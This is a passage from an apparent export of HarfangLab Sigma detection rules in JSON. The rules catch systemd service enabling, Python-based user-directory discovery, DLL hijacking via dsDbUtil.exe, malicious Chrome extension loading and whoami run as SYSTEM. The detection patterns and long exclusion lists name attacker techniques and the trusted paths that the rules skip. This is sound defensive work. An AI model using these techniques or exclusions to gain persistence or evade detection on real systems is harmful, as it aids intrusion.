"content": "title: SystemD Service Enabled\nid: 76f5d309-089f-432f-9c01-a5fd1570ea3e\ndescription: |\n Detects when a service is manually enabled with SystemD.\n Enabled services are services that will be automatically started when the system reboots.\n Adversaries may create or modify systemd services to automatically execute malicious payloads each time the system boots as part of persistence.\n It is recommended to ensure that both a legitimate administrator enabled this service and that the service is not suspicious.\nreferences:\n - https://attack.mitre.org/techniques/T1543/002/\n - https://attack.mitre.org/techniques/T1037/\n - https://attack.mitre.org/techniques/T1547/\n - https://attack.mitre.org/techniques/T1569/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.002\n - attack.t1037\n - attack.t1547\n - attack.execution\n - attack.t1569\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/systemctl'\n CommandLine|contains:\n - ' enable '\n - ' reenable '\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|/usr/bin/apt|'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_rpm:\n - ProcessImage: '/usr/bin/rpm'\n - ProcessParentImage: '/usr/bin/rpm'\n - ProcessGrandparentImage: '/usr/bin/rpm'\n - ProcessGrandparentCommandLine: '/bin/sh /var/tmp/rpm-tmp.?????? ?'\n exclusion_dnf:\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/bin/snap'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_cybereason:\n CommandLine: '/bin/systemctl enable --now cbram'\n ParentImage: '/opt/cybereason/sensor/bin/cybereason-sensor'\n\n exclusion_edutice:\n CommandLine:\n - 'systemctl enable avahi-daemon.socket'\n - 'systemctl enable avahi-daemon.service'\n ParentCommandLine: '/usr/bin/python3 /usr/lib/edutice/service/main.py'\n\n exclusion_dracut:\n ProcessParentCommandLine|startswith:\n - '/bin/bash -p /bin/dracut '\n - '/bin/bash -p /usr/bin/dracut '\n - '/usr/bin/bash -p /bin/dracut '\n - '/usr/bin/bash -p /usr/bin/dracut '\n - '/usr/bin/bash -p /usr/sbin/dracut '\n - '/usr/bin/bash -p /sbin/dracut '\n\n exclusion_authconfig_nscd:\n CommandLine: '/bin/systemctl enable nscd.service'\n GrandparentCommandLine|startswith: '/usr/bin/python /sbin/authconfig '\n\n exclusion_amazon:\n CommandLine: 'systemctl enable amazon-cloudwatch-agent.service'\n ParentCommandLine|contains: '/opt/aws/amazon-cloudwatch-agent/bin/amazon-cloudwatch-agent-ctl'\n\n exclusion_kpatch:\n CommandLine: 'systemctl enable kpatch.service'\n ParentCommandLine|startswith: '/usr/bin/bash /usr/sbin/kpatch '\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_eset:\n - ProcessParentCommandLine:\n - '/bin/sh /opt/eset/efs/lib/enable_user_monitoring.sh'\n - '/bin/sh /opt/eset/efs/lib/install_scripts/register_service.sh'\n - ProcessCommandLine: 'systemctl enable eraagent.service'\n ProcessParentCommandLine|startswith: '/bin/sh /tmp/????-????-????-????/agent_linux_x86_64.sh '\n - ProcessAncestors|contains: '|/opt/eset/RemoteAdministrator/Agent/ERAAgent|'\n\n exclusion_puppet:\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessAncestors|contains: '|/opt/puppetlabs/puppet/bin/ruby|'\n\n exclusion_cfengine:\n - ParentImage|startswith: '/var/cfengine/'\n - ParentCommandLine|contains: '/var/cfengine/'\n\n exclusion_manageengine:\n ProcessParentImage: '/usr/local/manageengine/uems_agent/bin/dcservice'\n\n exclusion_freecad:\n ProcessGrandparentImage: '/usr/bin/AppImageLauncher'\n\n exclusion_containerd:\n ProcessAncestors|contains: '|/usr/bin/containerd-shim-runc-v2|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_wapt:\n ProcessGrandparentImage:\n - '/opt/wapt/bin/python*'\n - '/opt/wapt/wapt-get.bin'\n\n exclusion_nslcd:\n ProcessCommandLine: '/bin/systemctl enable nslcd.service'\n ProcessGrandparentCommandLine: '/usr/bin/python /sbin/authconfig *'\n\n exclusion_rpm-tmp:\n ProcessParentCommandLine: '/bin/sh /var/tmp/rpm-tmp.?????? ?'\n\n exclusion_azure:\n - ProcessCommandLine:\n - systemctl enable azuremonitor-coreagent\n - systemctl enable azuremonitor-agentlauncher\n - systemctl enable azuremonitoragent\n ProcessGrandparentCommandLine: 'python? ./agent.py -enable'\n - ProcessCurrentDirectory|startswith: '/var/lib/waagent/Microsoft.'\n\n exclusion_fsecure:\n ProcessAncestors|contains: '|/opt/f-secure/linuxsecurity/bootstrap/sbin/fsbootstrap|'\n\n exclusion_gpli:\n ProcessCommandLine:\n - 'systemctl enable glpi-agent'\n - '/usr/bin/systemctl enable glpi-agent'\n ProcessParentCommandLine:\n - 'sh -c systemctl enable glpi-agent 2>/dev/null >/dev/null'\n - '/tmp/.mount_glpi-*/usr/bin/perl /tmp/.mount_glpi-*/glpi-agent-appimage-hook --install *'\n\n exclusion_sekoia:\n ProcessCommandLine:\n - 'systemctl enable SEKOIAEndpointAgentWatchdog.service'\n - 'systemctl enable SEKOIAEndpointAgent.service'\n ProcessParentImage:\n - '/tmp/sekoia-agent.bin'\n - '/var/lib/endpoint-agent/downloads/agent-linux-v?.?.?'\n\n exclusion_nutanix:\n ProcessCommandLine: 'systemctl enable nutanix-move.service'\n ProcessParentCommandLine|contains:\n - 'sh /tmp/nutanix_move_*/*/nutanix_move.sh '\n - 'sh /var/tmp/nutanix_move_*/*/nutanix_move.sh '\n\n exclusion_pcsd:\n ProcessCommandLine:\n - '/usr/bin/systemctl enable corosync.service'\n - '/usr/bin/systemctl enable pacemaker.service'\n ProcessCurrentDirectory: '/var/lib/pcsd/'\n\n exclusion_udscan:\n ProcessAncestors|contains: '|/opt/microfocus/Discovery/.discagnt/udscan|'\n\n exclusion_bladelogic:\n ProcessGrandparentImage: '/opt/bladelogic/*/NSH/sbin/bldeploy'\n\n exclusion_insights_client:\n ProcessCommandLine: 'systemctl enable --now insights-client.timer'\n ProcessParentCommandLine|endswith: ' /usr/lib/python?.?/site-packages/insights_client/run.py --register'\n\n exclusion_docker:\n ProcessCommandLine:\n - 'systemctl enable docker'\n - 'systemctl enable docker.service'\n - 'systemctl enable --now docker'\n\n exclusion_cockpit:\n ProcessAncestors|contains: '|/usr/bin/cockpit-bridge|'\n\n exclusion_google:\n ProcessAncestors|contains: '|/usr/bin/google_metadata_script_runner|'\n\n exclusion_parentimage:\n ProcessParentImage:\n - '/opt/hurukai-agent/data/upgrade_x64.elf'\n - '/opt/TrendMicro/EndpointBasecamp/bin/tmxbc'\n - '/opt/dynatrace/oneagent/agent/lib64/oneagentosconfig'\n - '/usr/bin/gitlab-runner'\n - '/usr/bin/udevadm'\n - '/GRANGLE/appserver/jdk/*/bin/java'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76f5d309-089f-432f-9c01-a5fd1570ea3e",
"rule_name": "SystemD Service Enabled",
"rule_description": "Detects when a service is manually enabled with SystemD.\nEnabled services are services that will be automatically started when the system reboots.\nAdversaries may create or modify systemd services to automatically execute malicious payloads each time the system boots as part of persistence.\nIt is recommended to ensure that both a legitimate administrator enabled this service and that the service is not suspicious.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1037",
"attack.t1543.002",
"attack.t1547",
"attack.t1569"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7720b1f7-b754-4828-9b33-cf1ea6a52a8e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295311Z",
"creation_date": "2026-03-23T11:45:35.295315Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295322Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/",
"https://opensource.apple.com/source/Libc/Libc-583/include/unistd.h.auto.html",
"https://www.manpagez.com/man/3/confstr/",
"https://attack.mitre.org/techniques/T1083/"
],
"name": "t1083_python_confstr_user_dir.yml",
"content": "title: User Directory Discovered via Python\nid: 7720b1f7-b754-4828-9b33-cf1ea6a52a8e\ndescription: |\n Detects the discovery of a user directory via the python3 os.confstr function.\n Attackers may use it during the discovery phase of an attack to retrieve a user directory.\n It is recommended to investigate the python script executed and to check for other suspicious activity by the parent process.\nreferences:\n - https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/\n - https://opensource.apple.com/source/Libc/Libc-583/include/unistd.h.auto.html\n - https://www.manpagez.com/man/3/confstr/\n - https://attack.mitre.org/techniques/T1083/\ndate: 2022/12/08\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Python\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image:\n - '/usr/bin/python'\n - '/usr/bin/python2'\n - '/usr/bin/python3'\n # _CS_DARWIN_USER_DIR\n CommandLine|contains|all:\n - '-c'\n - 'os.confstr(65536)'\n ParentImage|contains: '?'\n\n condition: selection\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7720b1f7-b754-4828-9b33-cf1ea6a52a8e",
"rule_name": "User Directory Discovered via Python",
"rule_description": "Detects the discovery of a user directory via the python3 os.confstr function.\nAttackers may use it during the discovery phase of an attack to retrieve a user directory.\nIt is recommended to investigate the python script executed and to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2022-12-08",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1083"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7733a4eb-7bdd-452b-a739-25c96d114aa5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587590Z",
"creation_date": "2026-03-23T11:45:34.587593Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587601Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsdbutil.yml",
"content": "title: DLL Hijacking via dsDbUtil.exe\nid: 7733a4eb-7bdd-452b-a739-25c96d114aa5\ndescription: |\n Detects potential Windows DLL Hijacking via dsDbUtil.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsDbUtil.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dsrole.dll'\n - '\\esent.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n - '\\srvcli.dll'\n - '\\vssapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7733a4eb-7bdd-452b-a739-25c96d114aa5",
"rule_name": "DLL Hijacking via dsDbUtil.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsDbUtil.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "773cd711-d0cd-4d90-aa4d-7fa3addbe709",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076419Z",
"creation_date": "2026-03-23T11:45:34.076421Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076425Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/lnk-between-browsers/",
"https://www.trendmicro.com/fr_fr/research/23/k/parasitesnatcher-how-malicious-chrome-extensions-target-brazil-.html",
"https://attack.mitre.org/techniques/T1176/"
],
"name": "t1176_chrome_extensions_load_linux.yml",
"content": "title: Suspicious Extensions Loaded by Chrome-based Browser (Linux)\nid: 773cd711-d0cd-4d90-aa4d-7fa3addbe709\ndescription: |\n Detects a Chrome-based browser launched with a specific argument that permits to load extensions from a specific folder.\n Adversaries may replace legitimate browser shortcuts with one that will load a malicious extension on process startup.\n It is recommended to check the content of the folder specified in the load-extension parameter for malicious extensions.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/lnk-between-browsers/\n - https://www.trendmicro.com/fr_fr/research/23/k/parasitesnatcher-how-malicious-chrome-extensions-target-brazil-.html\n - https://attack.mitre.org/techniques/T1176/\ndate: 2024/10/30\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1176\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.SensitiveInformation\n - classification.Linux.Behavior.CredentialAccess\nlogsource:\n product: linux\n category: process_creation\ndetection:\n selection:\n CommandLine|re: '--load-extension=[^ ]'\n ProcessParentImage:\n - '/usr/bin/xfce4-panel'\n - '/usr/bin/gnome-shell'\n - '/usr/bin/kde-open'\n - '/usr/bin/plasmashell'\n - '/usr/bin/cinnamon'\n\n filter_expected_folder:\n CommandLine|contains: '--load-extension=/usr/share/chromium/extensions/'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "773cd711-d0cd-4d90-aa4d-7fa3addbe709",
"rule_name": "Suspicious Extensions Loaded by Chrome-based Browser (Linux)",
"rule_description": "Detects a Chrome-based browser launched with a specific argument that permits to load extensions from a specific folder.\nAdversaries may replace legitimate browser shortcuts with one that will load a malicious extension on process startup.\nIt is recommended to check the content of the folder specified in the load-extension parameter for malicious extensions.\n",
"rule_creation_date": "2024-10-30",
"rule_modified_date": "2025-02-06",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1176"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "77575317-f87a-49a1-b295-f2a7a23f75d4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606040Z",
"creation_date": "2026-03-23T11:45:34.606044Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606051Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/blog/operation-doubletap",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_whoami_windows_system.yml",
"content": "title: Whoami Execution by System\nid: 77575317-f87a-49a1-b295-f2a7a23f75d4\ndescription: |\n Detects the execution of whoami.exe by the SYSTEM account.\n This command is often used by attackers during the discovery phase.\n This command being executed by the SYSTEM account may be related to an ongoing Local Privilege Escalation (LPE) vulnerability exploitation.\n It is recommended to investigate the ancestors of the whoami process to determine if they are either linked with malicious processes, the result of a successful elevation of privileges or a legitimate administrative or applicative action.\nreferences:\n - https://www.mandiant.com/resources/blog/operation-doubletap\n - https://attack.mitre.org/techniques/T1033/\ndate: 2023/12/15\nmodified: 2025/11/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n # whoami /groups\n - attack.t1069\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\whoami.exe'\n # Renamed binaries\n - OriginalFileName: 'whoami.exe'\n\n selection_system:\n IntegrityLevel: 'System'\n ParentImage|contains: '?'\n\n exclusion_parentimage:\n ParentImage:\n - '?:\\Program Files\\\\*\\\\*.exe'\n - '?:\\Program Files (x86)\\\\*\\\\*.exe'\n\n exclusion_grandparentimage:\n GrandparentImage:\n - '?:\\Program Files\\\\*\\\\*.exe'\n - '?:\\Program Files (x86)\\\\*\\\\*.exe'\n # IBM i Access Client Solutions\n - '*\\Start_Programs\\Windows_i386-32\\acslaunch_win-32.exe'\n - '*\\Start_Programs\\Windows_x86-64\\acslaunch_win-64.exe'\n - '*\\ArcGIS\\Portal\\framework\\service\\bin\\ArcGISPortal.exe'\n - '*\\ArcGIS\\Portal\\framework\\runtime\\jre\\bin\\javaw.exe'\n - '*\\BMC Software\\Client Management\\Client\\bin\\mtxopswatproxy.exe'\n - '?:\\wamp64\\bin\\apache\\apache?.?.??\\bin\\httpd.exe'\n - '?:\\Windows\\LTSvc\\LTSVC.exe'\n - '?:\\Windows\\Temp\\is-?????.tmp\\WinMerge-*-x64-Setup.tmp'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '?:\\Program Files (x86)\\Archimed\\Syracuse\\\\*\\Bin\\Communication\\Archimed.SyracuseIls.FileProviderService.exe'\n - '?:\\Program Files (x86)\\Archimed\\Syracuse\\\\*\\Bin\\Core\\Services\\Archimed.TaskSchedulerService.exe'\n - '?:\\U2\\unishared\\unirpc\\unirpcd.exe'\n - '?:\\U2\\UV\\bin\\uvservice.exe'\n - '?:\\Program Files (x86)\\Trend Micro\\SupportConnector\\SupportConnector.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe'\n - '?:\\Program Files (x86)\\\\*\\NinjaRMMAgent.exe'\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files (x86)\\wapt\\waptservice.exe'\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\dcconfig.exe'\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcagentservice.exe'\n - '?:\\Program Files\\Common Files\\Acronis\\Agent\\bin\\adp-agent.exe'\n - '?:\\Program Files\\Quest\\KACE\\konea.exe'\n - '?:\\Program Files\\APC\\PowerChute\\jre_x64\\bin\\java.exe'\n - '?:\\Program Files (x86)\\F-Secure\\PSB\\fshoster32.exe'\n\n exclusion_commandline:\n CommandLine: 'whoami /user /fo list'\n\n exclusion_ccmcache:\n CurrentDirectory|startswith: 